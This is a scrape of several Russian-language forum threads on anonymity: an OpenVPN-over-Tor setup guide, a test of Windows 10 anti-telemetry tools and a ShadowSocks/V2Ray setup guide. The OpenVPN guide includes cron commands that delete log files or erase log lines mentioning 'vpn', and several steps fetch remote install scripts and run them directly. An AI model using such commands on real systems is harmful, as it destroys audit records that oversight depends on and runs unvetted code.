Очевидно, что у меня нет возможности понять, где IP-адреса регистрируются в вашей системе. Итак, я создал "однострочник", который может помочь вам определить файлы, в которых регистрируются IP-адреса.

Code:Copy to clipboard

cat ./* | grep -E -R '([0-9]{1,3}\.){3}[0-9]{1,3}' | grep -oE '^[^:]+:' | awk -F ':' '{print $1}' | uniq

Изображение [5]: Файлы с IP адресами

Я советую вам использовать "strings" вместо cat.

Code:Copy to clipboard

strings ./* | grep -E -R '([0-9]{1,3}\.){3}[0-9]{1,3}' | grep -oE '^[^:]+:' | awk -F ':' '{print $1}' | uniq

Если вы хотите просмотреть все IP-адреса, залогированные в вашей системе, используйте это:

Code:Copy to clipboard

strings ./* | grep -E -o '([0-9]{1,3}\.){3}[0-9]{1,3}' | uniq

Я попытался отфильтровать локальные IP-адреса и проверить, сколько существует внешних IP-журналов. Ответ таков : 1255 - что, честно говоря, странно, почему сервер, который работает менее одного часа, уже имеет 1255 уникальных IP- подключений.

Code:Copy to clipboard

strings ./* 2>/dev/null | grep -E -o '([0-9]{1,3}\.){3}[0-9]{1,3}' | uniq | grep -v '10\|192\|127\|172\|0.0' | wc -l

Изображение [6]: Кол-во IP адресов

В любом случае, в этой части мы узнали об идентификации файлов логирования, которые могут содержать IP-адреса, сборе IP-адресов и проверке количества уникальных IP-адресов, которые пытались установить соединение.

Я не смог удержаться и написал еще одну строчку, которая покажет нам организацию и страну IP-адресов.

Code:Copy to clipboard

strings ./* 2>/dev/null | grep -E -o '([0-9]{1,3}\.){3}[0-9]{1,3}' | grep -v '10\|192\|127\|172\|0.0\|255' | uniq -u | xargs -I % curl https://ipinfo.io/% 2>/dev/null | jq -r '.ip, .country, .org'

Чего я не учел, так это того, что, возможно, в спистке логов также существуют IP-адреса, к которым мы пытались подключиться. Я понял это, когда проверил однострочки на своем собственном сервере. Либо это, либо системы, которым я отправлял запросы, пытались атаковать в ответ :lol:

Мое лицо после контратаки CTF:

Изображение [7]: Анимеееее

Настраиваем OpenVPN

Что такое OpenVPN?

OpenVPN - это программа с открытым исходным кодом, которое предоставляет возможность создания зашифрованных туннелей

Устанавливаем OpenVPN

Существует очень, очень простой способ установки и настройки openvpn. Это скрипт на github, который мы будем использовать.

Code:Copy to clipboard

wget https://raw.githubusercontent.com/angristan/openvpn-install/master/openvpn-install.sh
chmod +x openvpn-install.sh
./openvpn-install.sh

Мы должны ввести наш паблик IP-адрес, затем мы должны выбрать наш порт, это зависит от вас, я буду использовать 31337, я использовал TCP в качестве протокола, для OpenVPN по умолчанию используется UDP, как DNS resolver, я использовал Cloudflare. Теперь все, что нам нужно сделать, это подождать, и он запросит у нас имя клиента.

Изображение [8]: Настройка OpenVPN

Мы добавили пользователя "xss", теперь у нас есть файл "xss.ovpn", который является нашим файлом для openvpn.

Изображение [9]: Добавление пользователя

Мы также можем добавить нового пользователя, если захотим, сделав это ./openvpn-install.sh

Изображение [10]: Добавление пользователя

Теперь давайте проверим наш IP-адрес и проведем небольшой тест на утечку DNS, чтобы увидеть, не просочилось/утекло ли что-нибудь.

Изображение [11]: Whoer

Изображение [12]: DNSLeakTest

Изображение [13]: Whoer - DNS Leak

Как вы можете видеть на фотографиях, все выглядит идеально.

Стоит ли автоматом ежедневно удалять логи?

Часть OpenVPN готова, мы проверили системные логи, теперь пришло время для логов OpenVPN.

В моем случае я просто отредактировал /etc/openvpn/server.conf и заменил verb 3 на verb 0.

Code:Copy to clipboard

sudo nano /etc/openvpn/server.conf
#Заменяйте
verb 0
status /dev/null

Если увидите строки которые начинаются на log, log-append -добавьте перед ними

или ;

Code:Copy to clipboard

log
log-append

Удаление логов: Почему не следует удалять /var/log

Удаление лог-файлов или даже всего каталога /var/log является плохой идеей. Логи играют важную роль в обеспечении безопасности и отслеживании активности системы. Важно понимать, что некоторые процессы и службы могут зависеть от существования лог-файлов, и их удаление может нарушить работоспособность системы.

Для удаления устаревших лог-файлов мы можем использовать cron. Например, для удаления всех лог-файлов, содержащих ключевое слово "vpn", каждый час, мы можем создать соответствующую задачу cron:

Code:Copy to clipboard

0 */1 * * * find /var/log -exec grep -q 'vpn' {} \; -delete

Добавьте приведенный выше код внутрь /etc/crontab

НО если вы хотите удалить строки, содержащие слово "vpn", то используйте следующий код:

Code:Copy to clipboard

0 */1 * * *find /var/log -type f -exec sed -i '/vpn/d' {} \;

Я удалил /var/log, что делать?

Code:Copy to clipboard

sudo mkdir /var/log
sudo chmod 755 /var/log

Скопируйте и вставьте приведенный выше код, а затем перезагрузите сервер, он снова начнет логировать.

Мы -> OpenVPN -> Tor

Первым шагом является установка Tor. Для этого выполняем следующую команду:

Code:Copy to clipboard

sudo apt install tor

Далее мы настроим Tor, добавляя определенные параметры в файл "/etc/tor/torrc". Эти параметры определяют, как Tor будет работать. Файл "/etc/tor/torrc" - это конфигурационный файл Tor, где определены различные настройки.

Code:Copy to clipboard

sudo echo -e "VirtualAddrNetwork 10.192.0.0/10 \nAutomapHostsOnResolve 1 \nDNSPort 10.8.0.1:53530 \nTransPort 10.8.0.1:9040" >> /etc/tor/torrc

VirtualAddrNetwork - определяет, какие виртуальные адреса могут быть использованы в сети Tor.
AutomapHostsOnResolve - автоматическое сопоставление хостов при разрешении DNS-запросов.
DNSPort - указывает, на каком порту Tor будет слушать DNS-запросы.
TransPort - определяет порт, на котором Tor будет слушать входящие транспортные соединения.

После настройки Tor необходимо перезапустить службу, чтобы изменения вступили в силу:

Code:Copy to clipboard

sudo systemctl restart tor

Что такое iptables?

IPTables - это инструмент для настройки правил брандмауэра (firewall) в системах Linux. Он позволяет управлять тем, какие сетевые пакеты могут входить и выходить из нашей системы.

Что такое tun0?

tun0 - это виртуальный сетевой интерфейс, который может быть использован для маршрутизации трафика через туннель. В нашем случае это связано с OpenVPN

Что такое DNAT?

DNAT (Destination Network Address Translation) - это механизм в iptables, который позволяет изменять адрес назначения пакетов при их прохождении через брандмауэр. Мы используем DNAT для перенаправления трафика через Tor.

Эти правила позволят маршрутизировать трафик от OpenVPN через Tor.
Сначала мы разрешим входящие пакеты на интерфейсе "tun0" с исходным адресом 10.8.0.0/24:

Code:Copy to clipboard

sudo iptables -A INPUT -i tun0 -s 10.8.0.0/24 -m state --state NEW -j ACCEPT

Затем мы произведем перенаправление (DNAT) UDP-трафика с портом 53 с исходным (source) адресом 10.8.0.0/24 на адрес и порт (destination) 10.8.0.1:53530:

Code:Copy to clipboard

sudo iptables -t nat -A PREROUTING -i tun0 -p udp --dport 53 -s 10.8.0.0/24 -j DNAT --to-destination 10.8.0.1:53530

Также перенаправляйем TCP и UDP трафик:

Code:Copy to clipboard

sudo iptables -t nat -A PREROUTING -i tun0 -p tcp -s 10.8.0.0/24 -j DNAT --to-destination 10.8.0.1:9040
sudo iptables -t nat -A PREROUTING -i tun0 -p udp -s 10.8.0.0/24 -j DNAT --to-destination 10.8.0.1:9040

Теперь у нас настроены правила iptables для маршрутизации трафика через Tor.

В конечном итоге, этот процесс обеспечивает более высокий уровень приватности и безопасности при использовании OpenVPN. Надеюсь, что данная статья окажется полезной для всех, кто стремится защитить свои данные и соблюдать конфиденциальность в онлайн-мире.

Также отдельно спасибо f5ociety (не реклама) - часть с тор написал благодаря им - https://github.com/f5ociety/OpenVPN-over-Tor

Автор grozdniyandy

Источник https://xss.is/

Анонимность в Windows 10. Тестируем программы для отключения слежки

ID: 676533bbb4103b69df3718f9
Thread ID: 26444
Created: 2018-11-01T22:01:04+0000
Last Post: 2024-11-28T12:16:50+0000
Author: lukas
Replies: 9 Views: 3K

Анонимность в Windows 10. Тестируем программы для отключения слежки и повышения приватности.

С выхода Windows 10 прошло уже три с лишним года, а проблема слива пользовательских данных на серверы Microsoft так и не решена. Более того, она усугубилась принудительным сбросом настроек приватности и перезапуском отключенной службы обновлений. В этой статье мы сравним несколько утилит для управления «шпионскими» компонентами ОС и посмотрим, насколько они эффективны на современных сборках Windows 10.
В Microsoft никогда не скрывали, что собирают сведения о пользователях, просто раньше ограничивались витиеватыми фразами об отправке «некоторых сведений в целях улучшения пользовательского опыта». После вступления в силу Европейского регламента по защите данных и ряда других законов юристам компании пришлось раскрыть подробности. Вот здесь можно почитать о том, какие данные собираются, куда передаются, как обрабатываются и в каких случаях раскрываются.

Перед потребителями в Microsoft выкрутились тем, что якобы дают возможность самостоятельно настроить тип и количество передаваемых данных. Для этого необходимо установить пакет обновлений (для тех, у кого билд ниже 15063.0) и воспользоваться экраном конфиденциальности. Желательно сделать это еще на этапе установки.

По задумке, у пользователя возникает ощущение, что если все отключено, то данные утекать не будут. Однако это намеренно создаваемая иллюзия. Давай запустим сниффер и посмотрим, как обстоят дела в действительности.

Во всех тестируемых программах выбирались настройки блокировки по максимуму. Если какую-то функцию или приложение не заблокировать, то возникнет неопределенная погрешность. Будет непонятно: то ли это незаблокированный пункт приводит к сливу данных, то ли какую-то функцию программе не удалось отключить. Идеальный результат — это дамп сетевого трафика без IP-адресов Microsoft. Посмотрим, кто как справится с этой задачей, но для начала проверим штатные функции управления приватностью в Windows.

Проверка настроек приватности
Если оставить настройки по умолчанию, то после загрузки ОС сразу виден большой поток исходящего трафика на адреса Microsoft.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F3.png&hash=def2e60de72d022d5bc8eb0eb7da4356)
Мониторинг сетевого трафика с дефолтными настройками приватности

Теперь отключаем все, что отключается на экране приватности. Результат налицо.

[![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F4.png%2326847265&hash=5f6555ea85cc4da997392038538b1a60)](https://xakep.ru/wp- content/uploads/2018/10/190489/4.png#26847265)Мониторинг сетевого трафика с обрезанной передачей телеметрии

Однако даже после переключения всех флажков в запрещающее положение некоторые данные сразу отправляются в облачную платформу Microsoft Azure, причем в Сингапуре. В логах Wireshark я заметил IP-адреса сетевых узлов Microsoft из разных стран мира. Видимо, так работает балансировка нагрузки. Соединение с ними не постоянное (вышел на связь, передал что надо и оборвал соединение). Пул адресов очень большой. Я их перепроверил и убедился, что почти все они принадлежат Microsoft или ее партнерским сетям.

Сравнение программ
Для сравнения мы отобрали следующие «антишпионские» программы: Blackbird 1.0.28, Destroy Windows 10 Spying 1.0.1.0, DoNotSpy10 4.0, O&O ShutUp10 1.6.1399, Disable Win Tracking 3.2.1 и WPD 1.2.940. У всех этих приложений одна цель — не дать Microsoft получить какие-либо данные известным путем. Не лишены они и разных плюшек типа блокировки обновлений. Вот примерный список того, что следует ожидать от таких утилит:

отключение записи активности пользователя;
отключение отправки данных о вводе с клавиатуры;
отключение отправки образцов рукописного ввода;
отключение сбора диагностических данных (телеметрии);
отключение сбора данных о местоположении;
отключение и сброс персональных настроек Cortana;
отключение доступа в интернет для Windows Media DRM;
отключение доступа приложений к информации об учетной записи, календарю, сообщениям, камере, микрофону и местоположению;
(опционально) отключение службы обновления Windows для других продуктов.

Конечно, это не полный перечень, но тот разумный минимум, на который стоит ориентироваться. Все эти изменения можно сделать и вручную. Подобные «антишпионские» утилиты подкупают лишь тем, что применяют сотню твиков в пару кликов.

Как вообще работают эти утилиты?

Изменяют ключи реестра, отвечающие за настройки приватности.
Добавляют в файл %WINDIR%\System32\drivers\etc\hosts известные авторам программы URL сетевых узлов, на которые Microsoft сливает данные.
Добавляют в брандмауэр Windows наборы запрещающих правил, блокирующие подключение к известным IP-адресам Microsoft.
Останавливают «следящие» службы.
Удаляют «шпионские» задания планировщика.
В хардкорном варианте удаляют системные файлы и каталоги, отвечающие за «шпионские» функции.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fthemes%2Fengine%2Fimg%2Fwarning- icon.jpg%2326847265&hash=b76fc992d9934961d5406bb0c9993c87)WARNING
Попытка добиться максимальной приватности с помощью подобных программ может привести к тому, что перестанут работать и нужные компоненты, слетит активация Windows, ОС будет вести себя нестабильно или вообще не загружаться. Настоятельно рекомендуем не ограничиваться встроенными в них средствами резервного копирования, а использовать сторонние программы для создания полного образа диска. С ним гарантированно останется возможность вернуть систему в исходное состояние, что бы с ней ни случилось в ходе экспериментов.

Blackbird 1.0.28
https://www.getblackbird.net

Программа работает в консольном режиме. У нее изначально всего три функции:

сканировать систему и вывести все (по мнению разработчика) обнаруженные проблемы;
запустить менеджер блокировки;
сделать бэкап настроек. Вот эту функцию хочу особо отметить. Не каждая программа позволяет это сделать, так что, если что-то пошло не так, просто восстанавливаем настройки до блокировки и работаем дальше. Бэкап помещается в папку с программой, и, когда он сделан, программа меняет одну из своих функций с «Бэкапировать» на «Восстановить из бэкапа».

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F7.png&hash=07333aad535e4307c8d494f38f0fe539)
Интерфейс Blackbird

После сканирования выдается очень большой список «недочетов», которые надо исправить.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F8.png&hash=edc5e46fe2cce37788980e16aa1498ea)
Сканирование в Blackbird

Перейдем к списку блокировки. Нажимаем А на главном экране программы и видим такую картинку.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F9.png&hash=50d07d1792db8ba1c921817094511341)
Список приложений и служб для блокировки Blackbird

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F10.png&hash=c89329a760c4bd70907e85af86e6b0d9)
Разница в билдах Windows 10 в Blackbird

После выполненных действий в сборке 1709 удалось отключить все «следящие» функции, программа справилась на ура. На сборке 1803 одна функция так и не была отключена, причем их общее количество почему-то стало 79.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F11.png&hash=b676637e3ceb63fe05c80ae80d3fb79b)
Blackbird не полностью справилась со сборкой 1803

Два дня наблюдений за поведением операционных систем показали, что после работы Blackbird исходящий трафик стал меньше в разы. Однако тестовый комп со сборкой 1803 постоянно передавал данные на IP 104.25.219.21. Shodan говорит, что он принадлежит известному облачному провайдеру Cloudflare. Насколько мне известно, Microsoft давно арендует у него хостинг для виртуальных серверов сбора статистики. Больше подобной сетевой активности не отмечалось, если не считать скачивания обновлений.

При восстановлении из созданного Blackbird бэкапа лучше не стало. В сборке 1709 слетела активация Windows и появились две ошибки реестра. После перезагрузки ни одна проблема так и не была устранена. Сборка 1803 вообще не смогла запустить Blackbird для восстановления из бэкапа, начав ругаться на ошибку файловой системы (хотя с ФС все было в порядке).

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F12.jpg&hash=c2f791700f858f0f62681f8ce84ffcc4)
Ошибки при восстановлении бэкапа

Вывод очевиден. Blackbird место в нашей бывшей рубрике «Западлостроение».

Destroy Windows 10 Spying 1.0.1.0
https://github.com/Nummer/Destroy-Windows-10-Spying

Destroy Windows 10 Spying — программка, которая, скорее всего, уже на слуху у каждого, кто задавался вопросом, как отключить передачу своих данных в Microsoft. Поговаривают, что после версии 1.0.1.0 сменился разработчик и в новые релизы начали вшивать троян. Поэтому воспользуемся последней официальной версией, которую выпустил Nummer.

Версия 1.0.1.0 написана в апреле 2018 года. На моих сборках она запустилась и определила их правильно. Помимо прочего, в программе есть функция отключения обновлений Windows, которой я заодно и воспользовался.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F13.png&hash=82d79cdb75455899363091cecc11c105)
Destroy Windows 10 Spying 1.0.1.0

Все изменения вносятся при нажатии большой кнопки «Destroy Windows Spying NOW!». Работа программы проходит в три этапа: отключение «шпионских» сервисов, добавление известных IP-адресов в правила брандмауэра и прописывание URL серверов сбора статистики Microsoft в файл host. Затем следует перезагрузка с применением всех изменений.

Результаты работы DWS меня огорчили.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F14.png&hash=6b6aa859c01f572ebd691d293532c78b)
Дамп Wireshark после DWS

С блокировкой Windows Update программа DWS тоже сработала криво. После четырех-пяти перезапусков Windows в логах TCPView снова засветился svhost, который как ни в чем не бывало продолжил доставлять обновления. Еще я обратил внимание на очень тесный диалог сборки 1709 с IP-адресом сервера в сети Akamai Technologies, сотрудничающей с Microsoft, и сильное увеличение пакетов SSDP. Возможно, винда сама перебирала запасные способы отправить данные, когда собственные серверы оказались частично недоступны.

DoNotSpy10 4.0
https://pxc-coding.com/donotspy10

Еще одна популярная программа с удобным интерфейсом. Для каждого пункта разработчик сделал небольшое описание, поэтому разобраться в ней просто — расставляй галочки, и вперед!

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F15.jpg&hash=96fcd84c212d5190d4377c806e91aba8)
Интерфейс DoNotSpy10

Эта программа предоставляет возможность сделать точку отката системы до применения изменений (не бэкап настроек, а именно системную точку отката). На мой взгляд, с количеством функций в ней немного перестарались — очень уж много всяких фич. Применил я все по максимуму, и результат работы меня удивил. После четырех часов простоя систем они начали самостоятельно перезагружаться. Оказалось, что за это время по-тихому накатились «заблокированные» обновления. Wireshark собрал почти 400 тысяч пакетов за час, чего с другими программами не наблюдалось. Большинство пакетов было адресовано именно туда, куда DoNotSpy10 должна была запретить их отсылать. Вдобавок ко всему слетели лицензии с обеих ОС.

Программа DoNotSpy10 наверняка понравится мазохистам и разочарует всех остальных.

O &O ShutUp10 1.6.1399
https://www.oo-software.com/en/shutup10

Эта программка немецких разработчиков O&O Software имеет удобный интерфейс и несколько профилей настроек. Можно применить только рекомендуемые или все сразу в один клик. Также среди плюсов отмечу импорт и экспорт параметров реестра. Как показала практика, это очень важный момент. Машинный перевод на русский режет глаз, но его достаточно для понимания подсказок, которые всплывают при нажатии на строку отключения функции.

В окне программы сделана колонка с названием «Рекомендовано?», а в ней пункты с пометкой «НЕТ». Сначала кажется, что это какие-то особо опасные твики, но среди них перечислены и автообновления.

Сразу хочу отметить одну важную деталь: в сборке 1709 программа предлагает изменить 97 пунктов, а в 1803 — уже 100. Добавленные три пункта находятся в разделе «Конфиденциальность приложений» и запрещают доступ к документам, изображениям и видео.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F24.png&hash=e05c6232d6baf06237678d3d00a95bcb)
Различие O&O ShutUp10 на разных сборках Windows 10

При выборе первой же «следящей» функции программа выдала предупреждение о том, что в системе отключена функция создания точек восстановления. Еще один плюс в карму!

Как и во всех предыдущих тестах, я выбрал настройки «ультра», чтобы по максимуму использовать возможности программы. Сразу перед закрытием O&O ShutUp10 предупредила, что если на комп накатятся (а по мнению разработчиков, они все равно накатятся) обновления, то придется запускать программу заново и возвращать настройки. Почему бы тогда полностью не заблокировать их установку?

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F18.png&hash=80403845d5e023dae0cf573d46eaccbb)
Второе немецкое предупреждение

Сразу после следующей загрузки ОС и до запуска Wireshark TCPView показал неприятную картину. Опять процессы общаются с адресами MS!

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F19.png&hash=60eeaf00978c8a8a6c4ab4d679d6f241)
Запрет сработал только частично

Дамп Wireshark тоже не порадовал. Явно видна установка сессии и передача данных, хотя пакетов отправляется и не так много.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F21.png&hash=8ba24438db60cdda069709a3692ba307)
Дамп трафика Windows 10 1803

Как и ожидалось, svhost подкачивает обновления, хотя я отключил их в O&O ShutUp10, указав два связанных с Windows Update пункта.

Через пять-восемь часов пропал доступ к интернету. Вернуть его удалось перезагрузкой сетевого адаптера, но следующая проверка наличия обновлений в Windows закончилась неудачей.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F22.jpg&hash=673b26dfa1d9ce3d332270796fea2c13)
Ошибка обновлений

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F23.png&hash=1324f5b578b207fef97b6328735b22a9)
O&O ShutUp10

Возврат настроек прошел безболезненно. Тут и говорить особо не о чем.

К работе самих ОС после использования O&O ShutUp10 никаких нареканий нет. Несколько раз был удивлен более быстрой работой (с нищебродскими ресурсами, выделенными на одну основную и две гостевые ОС, мне это очень сильно заметно).

Disable Win Tracking
https://github.com/10se1ucgo/DisableWinTracking

Disable Win Tracking 3.2.1 — еще одна небольшая и простая утилита со спартанским интерфейсом. Обновилась она в начале года, но про поддержку разных билдов Windows ничего не сказано.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F10%2F190489%2F29.png&hash=fa22fa2213690c5c53d0b8deccff333c)
Disable Win Tracking

Пункт Services имеет на выбор два режима: удалить службы и отключить их (я выбирал удалить). Действия производятся с двумя службами: DiagTrack (сервис контроля за сбором диагностических данных) и dmwappushsvc (служба маршрутизации WAP Push Message). Все остальное довольно просто и понятно. При выделении части пунктов утилита заботливо предупредит, что, если отключаешь какие-то функции, будут последствия и некоторые приложения могут перестать работать.

Через три дня теста установились очередные обновления. Служба dmwappushsvc снова появилась в списке, но была в отключенном состоянии. По результатам мониторинга сети: адреса Microsoft и Akamai в логах никуда не делись. Мои операционки регулярно выходили с ними на связь, но трафика стало меньше. На стабильности работы ОС действия Disable Win Tracking никак не отразились, а вот Skype перестал работать. Вмешательства в систему оказались минимальные: добавление правил для встроенного файрвола и несколько правок реестра.

Did Police Break Tor?

ID: 676533bbb4103b69df3718fb
Thread ID: 124817
Created: 2024-10-14T20:08:44+0000
Last Post: 2024-11-26T00:21:15+0000
Author: espe0n
Replies: 27 Views: 3K

i was looking at some articles, and i ended up watching a video of mental outlaw talking about TOR nodes, and i'm wondering how secure you think tor can be and if you think tor can become insecure (or more insecure) over time?

Методы маскировки трафика и обхода средств обнаружения и блокировок (ShadowSocks, V2Ray/X-Ray и Cloak)

ID: 676533bbb4103b69df371901
Thread ID: 92316
Created: 2023-07-07T15:14:19+0000
Last Post: 2024-11-23T22:27:15+0000
Author: baykal
Prefix: Статья
Replies: 24 Views: 3K

В данной статье я опишу самые относительно популярные методы обфускации трафика, такие как: ShadowSocks, V2Ray/X-Ray и Cloak.

Поскольку в большинстве случаев эти решения используют для обхода ограничений интернет-цензуры в Китае, то и документация по настройке этих решений на китайском, но я опишу всё это на более понятном языке.

И так, для начала я опишу каждый из этих 3 протоколов по отдельности.

ShadowSocks - это протокол с открытым исходным кодом на основе прокси, предназначенный для обхода интернет-цензуры и шифрованния трафика. Он работает путем создания защищенного туннеля между клиентом и сервером, через который направляется весь трафик. Он похож на другие технологии VPN, но он оптимизирован для соединений с низкой задержкой, что делает его подходящим для приложений, требующих быстрого времени отклика, таких как онлайн-игры и трансляция видео в реальном времени.

Он использует прокси-сервер в качестве посредника между клиентом и сервером назначения. Клиент отправляет свой трафик на прокси-сервер, который затем пересылает его на целевой сервер. Трафик между клиентом и прокси-сервером шифруется с помощью AES, а трафик между прокси-сервером и сервером назначения не шифруется.

Протокол ShadowSocks использует технику, называемую "обфускацией", чтобы скрыть факт его использования. Обфускация включает в себя изменение характеристик трафика таким образом, чтобы он выглядел как нечто иное. Например, может быть изменен IP-адрес назначения или номер порта, или в трафик могут быть добавлены случайные данные. Это затрудняет обнаружение и блокирование трафика цензорами.

ShadowSocks популярен, потому что он прост в использовании и относительно легок. Он не требует специального программного или аппаратного обеспечения на стороне клиента и может быть развернут на различных платформах, включая Windows, macOS, Linux и мобильные устройства. Он также хорошо настраивается, поддерживая множество алгоритмов шифрования и методов обфускации.

Инструкции по настройке ShadowSocks:
Нам понадобится выделенный виртуальный сервер, на котором мы будем поднимать и устройство под управлением Windows/Linux/macOS, с которого мы будем поднимать наш прокси-сервер.
В данном примере я буду использовать сервер под управлением Debian 11 и устройство под управлением Whonix.

Для начала скачиваем программу Outline Manager с официального сайта - https://getoutline.org/

Для Linux данная программа поставляется в виде портативного приложения формата AppImage, чтоб запустить данный файл, необходимо сделать его исполняемым

Вводим в терминале команду:

Code:Copy to clipboard

sudo chmod +x ‘перенести файл в окно терминала’

После выполнения команды файл станет исполняемым и его можно запустить двойным щелчком мыши

Откроется вот такое окно:

Выбираем пункт “Настроить Outline где угодно”

В следующем окне вы увидите команду, которую надо будет ввести на вашем сервере, для этого подключаемся к серверу по ssh командой:

Code:Copy to clipboard

ssh root@ip_адрес_сервера

На сервере вводим команду из данного окна, в моем случае это:

Code:Copy to clipboard

sudo bash -c "$(wget -qO- https://raw.githubusercontent.com/Jigsaw-Code/outline-server/master/src/server_manager/install_scripts/install_server.sh)"

Если у вас не установлен Docker, то система оповестит об этом и предложит установить его, жмем Enter и ждем окончания установки

По окончанию установки система выдаст вам ссылку, выделенную оранжевым цветом, копируем её и вставляем в окно Outline Manager в пункт 2 (отмечено красным)

Жмем “Готово” и получаем ссылку для подключения к нашему серверу.

Для смартфона я рекомендую приложение shadowsocks - https://github.com/shadowsocks/shadowsocks-android
В нем вы можете подключиться к серверу по ссылке и там уже увидеть ключ и пароль, чтоб подключиться через другие клиенты на ПК или роутере.

V2Ray (X-Ray) - это универсальное и мощное прокси-программное обеспечение, которое работает как коммуникационная платформа. Она предназначена для обхода сетевых ограничений и обеспечения безопасного и приватного доступа в Интернет для пользователей. V2Ray поддерживает различные протоколы, такие как HTTP, TCP, mKCP, WebSocket, xTLS, xUDP, протоколы системы доменных имен (DNS) и другие, и может быть настроен для работы с несколькими операционными системами.

Он работает путем создания сети узлов, которые работают вместе для направления трафика. Эти узлы называются "входящими" и "исходящими" соединениями. Входящие соединения принимают трафик, а исходящие соединения передают трафик. Архитектура V2Ray позволяет ему выполнять сложные операции по маршрутизации трафика, что делает его более безопасным и надежным прокси-решением.

Одним из основных преимуществ V2Ray является его способность шифровать и маскировать сетевой трафик с помощью различных протоколов, таких как xTLS, mKCP и WebSocket. Эта функция обеспечивает конфиденциальность и безопасность сетевой активности, которую трудно обнаружить или заблокировать. Кроме того, V2Ray имеет встроенную функцию балансировки нагрузки, которая может распределять сетевой трафик между различными серверами для повышения производительности и надежности.

Гибкие возможности конфигурации V2Ray позволяют легко настроить прокси-сервер в соответствии с конкретными требованиями. Пользователь может настраивать различные параметры, такие как порты, протоколы, методы шифрования и правила маршрутизации.

Инструкции по настройке V2Ray:

В данной статье я расскажу, как поднять V2Ray с протоколами VMESS и VLESS на своем сервере. Данная инструкция будет полезна в случае организации жесткой интернет-цензуры на территории какой-либо страны, либо при посещении таких стран, как Иран и Китай, где уже внедрена жесткая цензура и ограничения.
Стоит отметить, что VMESS и VLESS работают не в связке, а параллельно, т.е. можно подключиться к любому из этих протоколов в зависимости от скорости работы и эффективности противодействия блокировкам
Начнем с описания этих протоколов:

VMESS - это протокол, используемый прокси-сервером V2Ray для обеспечения зашифрованной связи между клиентом и сервером. Это один из самых передовых протоколов, предоставляющий множество функций и опций для настройки сетевого трафика.

VMESS использует комбинацию симметричного шифрования AES и ассиметричного шифрования RSA для защиты трафика между клиентом и сервером. Протокол также использует технику, называемую обфускацией трафика, чтобы затруднить обнаружение и блокирование трафика.

Одной из ключевых особенностей VMESS является поддержка множества входящих и исходящих протоколов, таких как TCP, UDP, HTTP, HTTPS и DNS.

Еще одной важной особенностью VMESS является поддержка нескольких транспортных протоколов, включая mKCP, TCP, WS, HTTP/2 и QUIC. Это позволяет протоколу адаптироваться к различным условиям сети и обеспечивать стабильное и быстрое соединение.

VMESS также поддерживает расширенные функции, такие как динамическое распределение портов, балансировка нагрузки и маршрутизация на основе доменных имен. Эти функции позволяют настраивать и оптимизировать сетевой трафик для различных случаев использования и сценариев.

VLESS - это более новый протокол, который был представлен в версии v2ray 4.23.0, и расшифровывается как "VMESS-less". VLESS разработан как более легкая и безопасная версия VMESS, без ущерба для гибкости и возможностей, которые пользователи привыкли получать от V2Ray.

Одно из основных отличий между VLESS и VMESS заключается в том, что VLESS по умолчанию использует шифрование TLS, что обеспечивает дополнительный уровень безопасности по сравнению с VMESS. Это означает, что сервер и клиент VLESS обмениваются данными через зашифрованное соединение, что предотвращает подслушивание и несанкционированное вмешательство третьих лиц. Кроме того, VLESS разработан как более эффективный протокол, чем VMESS, что означает, что он может обрабатывать больше трафика при меньших ресурсах.

Еще одной ключевой особенностью VLESS является упрощенная конфигурация. VLESS требует только один UUID для аутентификации клиента, в то время как VMESS требует как ID, так и alterID. Это упрощает его настройку и использование, особенно для пользователей, которые только начинают работать с V2Ray. Тем не менее, VLESS по-прежнему поддерживает расширенные возможности, такие как несколько пользователей и правила маршрутизации, поэтому он остается мощным и гибким протоколом.

В целом, VLESS обладает рядом преимуществ по сравнению с VMESS, включая повышенную безопасность, эффективность и простоту использования. Однако важно отметить, что VLESS все еще относительно новый протокол, и не все клиенты и серверы V2Ray могут его поддерживать.

Теперь приступим к настройке, все действия я буду производить на выделенном сервере под управлением Debian 11. Поскольку в репозиториях Debian старая версия V2Ray, использовать будем Docker-контейнер. Для начала подключаемся к серверу по SSH командой:

Code:Copy to clipboard

ssh root@ip_сервера

Устанавливаем Docker по инструкции с официального сайта Docker - https://docs.docker.com/engine/install/debian/

Скачиваем необходимый Docker-контейнер командой

Code:Copy to clipboard

docker pull teddysun/v2ray

Теперь необходимо сгенерировать UUID для конфигурации через сайт https://www.uuidgenerator.net/version4
Копируем этот UUID, он понадобится для подключения к нашему серверу по этим протоколам

